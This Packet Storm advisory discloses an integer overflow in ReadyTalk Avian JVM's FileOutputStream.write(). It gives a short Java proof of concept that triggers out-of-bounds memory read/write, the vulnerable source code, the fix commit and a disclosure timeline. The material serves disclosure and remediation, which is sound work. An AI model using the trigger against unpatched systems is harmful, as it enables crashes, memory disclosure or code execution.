exploit the possibilities

ReadyTalk Avian JVM FileOutputStream.write() Integer Overflow

ReadyTalk Avian JVM FileOutputStream.write() Integer Overflow
Posted Nov 13, 2020
Authored by Pietro Oliva

ReadyTalk Avian JVM versions 1.2.0 before 27th October 2020 suffer from a FileOutputStream.write() integer overflow vulnerability.

tags | exploit, overflow
MD5 | 0eeb53af3d334c2876f02c02ffa0e8e8

ReadyTalk Avian JVM FileOutputStream.write() Integer Overflow

Change Mirror Download
Vulnerability title: Avian JVM FileOutputStream.write() Integer Overflow
Author: Pietro Oliva
Vendor: ReadyTalk
Product: Avian JVM
Affected version: 1.2.0 before 27th October 2020
Fixed Version: 1.2.0 since 27th October 2020

Description:
The issue is located in the FileOutputStream.write() method defined in
FileOutputStream.java, where a boundary check is performed in order to prevent
out-of-bounds memory read/write. However, this check contained an integer
overflow which leads to the same check being bypassed and out-of-bounds
read/write.

Impact:
Attackers could exploit this vulnerability to read/write arbitrary content in
the JVM memory. This could in turn result in denial of service, memory
disclosure, or arbitrary code execution in the context of the JVM.

Exploitation:
The following PoC would trigger an OOB read/write and/or crash of Avian JVM:

import java.io.IOException;
import java.io.FileDescriptor;
import java.io.FileOutputStream;

public class poc {

public static void main(String[] args) throws IOException {
byte[] data = "somedata".getBytes();
FileDescriptor fd = new FileDescriptor().out;
FileOutputStream fos = new FileOutputStream(fd);

fos.write(data, 1, 0x7fffffff); // Integer overflow + OOB read/write here
}
}


Evidence:

public void write(byte[] b, int offset, int length) throws IOException {
if (b == null) {
throw new NullPointerException();
}

if (offset < 0 || offset + length > b.length) { // Integer overflow here
throw new ArrayIndexOutOfBoundsException();
}

write(fd, b, offset, length);
}

extern "C" JNIEXPORT void JNICALL
Java_java_io_FileOutputStream_write__I_3BII(JNIEnv* e,
jclass,
jint fd,
jbyteArray b,
jint offset,
jint length)
{
jbyte* data = static_cast<jbyte*>(malloc(length));

if (data == 0) {
throwNew(e, "java/lang/OutOfMemoryError", 0);
return;
}

e->GetByteArrayRegion(b, offset, length, data);
if (not e->ExceptionCheck()) {
doWrite(e, fd, data, length);
}

free(data);
}

void JNICALL GetByteArrayRegion(Thread* t,
jbyteArray array,
jint offset,
jint length,
jbyte* dst)
{
ENTER(t, Thread::ActiveState);

if (length) {
// Out-of-bounds read/write here
memcpy(dst, &(*array)->body()[offset], length * sizeof(jbyte));
}
}

As can be observed above, offset+length can overflow in FileOutputStream.write()
and later result in OOB read/write during memcpy() in GetByteArrayRegion().

Mitigating factors:
Since offset needs to be a positive integer, and length is limited to a valid
malloc argument, there is a limited range of memory where an attacker could read
or write as a result of this vulnerability.

Remediation:

A fix has been made available with the following commit:
https://github.com/ReadyTalk/avian/commit/0871979b298add320ca63f65060acb7532c8a0dd

Disclosure timeline:
20th October 2020 - Vulnerability reported.
20th October 2020 - Vulnerability acknowledged.
20th October 2020 - CVE request sent to Mitre.
23rd October 2020 - Sent reminder to Mitre.
27th October 2020 - Sent reminder to Mitre.
27th October 2020 - Patch proposed via pull request.
27th October 2020 - Patch merged into master branch.
29th October 2020 - Sent reminder to Mitre.
2nd November 2020 - CVE request sent again to Mitre.
11th November 2020 - Vulnerability details shared on fulldisclosure without CVE identifier.


Login or Register to add favorites

File Archive:

December 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    22 Files
  • 2
    Dec 2nd
    33 Files
  • 3
    Dec 3rd
    16 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close